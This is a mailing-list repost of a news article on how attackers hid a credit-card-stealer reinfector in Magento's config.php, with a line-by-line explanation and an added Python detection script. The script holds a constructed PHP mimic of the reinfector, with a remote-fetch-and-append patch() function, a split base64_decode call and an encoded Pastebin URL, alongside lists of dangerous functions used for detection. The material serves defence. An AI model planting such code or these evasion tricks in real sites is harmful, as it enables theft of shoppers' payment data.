[BreachExchange] Magento Hackers Using Simple Evasion Trick to Reinfect Sites With Malware

Destry Winant destry at riskbasedsecurity.com
Wed Jun 20 22:48:06 EDT 2018


https://thehackernews.com/2018/06/magento-security-hacking.html

Security researchers are warning of a new trick that cybercriminals use
to hide malicious code whose job is to re-introduce an infection that
steals confidential information from Magento-based e-commerce websites.

So even if you have already cleaned up your hacked Magento website,
there is a chance it is still leaking your customers' login credentials
and credit card details to the attackers.

More than 250,000 online stores use the open-source Magento e-commerce
platform, which makes them an enticing target for hackers; the security
of both your own data and your customers' data is therefore of the
utmost importance.

According to the researchers at Sucuri, who have previously spotted
several Magento malware campaigns in the wild, cybercriminals are
currently using a simple yet effective method to ensure that their
malicious code is added back to a hacked website after it has been
removed.

To achieve this, the criminals hide their 'credit card stealer
reinfector' code inside the default configuration file (config.php) of
the Magento website. That file is included by the main index.php and so
runs on every page view, re-injecting the stealer code into multiple
files of the website whenever it is found to be missing.

Since config.php is generated automatically when Magento is installed,
administrators and site owners are usually advised not to edit it
directly, and it is therefore a file that is seldom reviewed.

Here's How Magento's Reinfector Code Works

The reinfector code spotted by the researchers is interesting in that
it is written to be hard for security scanners to identify, and it
hardly looks malicious to an untrained eye.

The attackers added 54 extra lines of code to the default configuration
file. Below, the malicious reinfector code written into config.php is
explained line by line; the line numbers refer to the screenshots in
the original article.

At line 27, the attackers set error_reporting() to false, disabling
PHP's error messages, which could otherwise reveal the path of the
malicious code to site admins.

From lines 31 to 44 there is a function called patch(), written to
append the code that steals confidential information to legitimate
Magento files.

patch() takes four arguments, which define the directory and the name
of the file to be infected, the file size used to decide whether that
file still needs to be reinfected, the name of a new file to create,
and a remote URL from which the malicious code is downloaded at run
time and injected into the targeted file.

From lines 50 to 51, the attackers have split the call to
base64_decode() into several pieces, so that a scanner searching for
the literal function name does not match it.

Line 52 holds a base64-encoded value that decodes to
"http://pastebin.com/raw/" when run through the function assembled in
lines 50-51.

The next four sets of variables, from lines 54 to 76, define the four
sets of values passed as arguments to the patch() function described
above.

The last line of each set holds a random eight-character value which,
concatenated with the decoded link from line 52, yields the final URL
on Pastebin from which patch() downloads the malicious code.

From lines 78 to 81, the attacker finally calls patch() four times with
the different values defined in lines 54-76, reinfecting the website
with the credit card stealer.

"As a rule of thumb, on every Magento installation where a compromise
is suspected to have taken place, the /includes/config.php should be
verified quickly," researchers advise.
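As an added example (not Sucuri's tooling, Magento's code, or anything from the original article), the following Python script checks a config.php for the traits described in the walkthrough above and, following the rule of thumb quoted from the researchers, diffs it against a pristine copy. Both configuration samples are constructed: the "clean" one is a stand-in for a real includes/config.php, and the "infected" one is an inert mimic of the described reinfector with a placeholder paste id; the Magento paths and file names in it are illustrative, and the function and pattern names are this example's own.

```python
"""Heuristic scan of a Magento config.php for the reinfector traits described
in the article: suppressed error reporting, a function defined in a file that
should hold only configuration, a function name assembled from string
fragments, a base64 literal hiding a URL, and calls that write files or fetch
remote content. Added example with constructed samples; not Sucuri's tooling
or Magento's own code.
"""
import base64
import difflib
import re

# Constructed stand-in for a pristine includes/config.php (not a real Magento file).
CLEAN_CONFIG = """<?php
define('COMPILER_INCLUDE_PATH', dirname(__FILE__) . DIRECTORY_SEPARATOR . 'src');
"""

PASTEBIN_B64 = base64.b64encode(b"http://pastebin.com/raw/").decode()

# Constructed mimic of the described reinfector: error reporting off, a patch()
# helper, base64_decode split into fragments, an encoded Pastebin prefix and a
# fake eight-character paste id. Inert test data, not a real sample.
INFECTED_CONFIG = CLEAN_CONFIG + f"""
error_reporting(false);
function patch($path, $file, $size, $link) {{
    if (filesize($path . $file) < $size) {{
        file_put_contents($path . $file, file_get_contents($link), FILE_APPEND);
    }}
}}
$b = 'ba' . 'se' . '64_' . 'dec' . 'ode';
$link = $b('{PASTEBIN_B64}');
$id1 = 'a1b2c3d4'; // placeholder id, constructed for this example
patch('app/code/core/Mage/Core/', 'Model/Abstract.php', 1024, $link . $id1);
"""

DANGEROUS = {"base64_decode", "eval", "file_get_contents", "file_put_contents",
             "gzinflate", "str_rot13", "system", "shell_exec", "assert"}

STRING_LIT = r"""(?:'[^'\\]*(?:\\.[^'\\]*)*'|"[^"\\]*(?:\\.[^"\\]*)*")"""
LITERAL_RE = re.compile(STRING_LIT)
CONCAT_RE = re.compile(STRING_LIT + r"(?:\s*\.\s*" + STRING_LIT + r")+")
WRITE_OR_FETCH_RE = re.compile(
    r"\b(file_put_contents|file_get_contents|fwrite|fopen|curl_exec)\s*\(")


def joined_literals(source):
    """Assemble every chain of concatenated string literals ('ba' . 'se' ...)."""
    return ["".join(lit[1:-1] for lit in LITERAL_RE.findall(m.group(0)))
            for m in CONCAT_RE.finditer(source)]


def decoded_urls(source):
    """Return URLs hidden inside base64-looking string literals."""
    urls = []
    for lit in LITERAL_RE.findall(source):
        s = lit[1:-1]
        if len(s) < 16 or not re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", s):
            continue
        try:
            decoded = base64.b64decode(s, validate=True).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            continue
        if decoded.startswith(("http://", "https://")):
            urls.append(decoded)
    return urls


def scan(source):
    """Return human-readable findings; an empty list means nothing suspicious."""
    findings = []
    if re.search(r"\berror_reporting\s*\(\s*(0|false)\s*\)", source, re.I):
        findings.append("error reporting disabled")
    for name in joined_literals(source):
        if name in DANGEROUS:
            findings.append(f"split function name: {name}")
    for url in decoded_urls(source):
        findings.append(f"base64-hidden URL: {url}")
    for m in re.finditer(r"\bfunction\s+(\w+)\s*\(", source):
        findings.append(f"function defined in config file: {m.group(1)}")
    for fn in WRITE_OR_FETCH_RE.findall(source):
        findings.append(f"file write or remote fetch: {fn}")
    return findings


def added_lines(baseline, source):
    """Lines present in `source` but absent from `baseline` (a pristine copy)."""
    diff = difflib.unified_diff(baseline.splitlines(), source.splitlines(),
                                lineterm="", n=0)
    return [line[1:] for line in diff
            if line.startswith("+") and not line.startswith("+++")]


if __name__ == "__main__":
    for label, cfg in (("clean", CLEAN_CONFIG), ("infected", INFECTED_CONFIG)):
        print(label, scan(cfg) or "no findings")
    print("extra lines:", len(added_lines(CLEAN_CONFIG, INFECTED_CONFIG)))
```

To use it on a real store, read includes/config.php into `scan()` and diff it with `added_lines()` against a copy taken from a fresh install of the same Magento version kept off the web server. The regexes are heuristics, so treat a hit as something to confirm by hand rather than as proof of compromise, and remember that a clean config.php is only one of the places the stealer itself may have been re-injected.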

It should be noted that a similar technique can be used to hide
malicious code on websites built on other content management systems,
such as Joomla and WordPress.

Since attackers mostly exploit known vulnerabilities to compromise
websites in the first place, site owners are always advised to keep
their website software and servers updated with the latest security
patches.
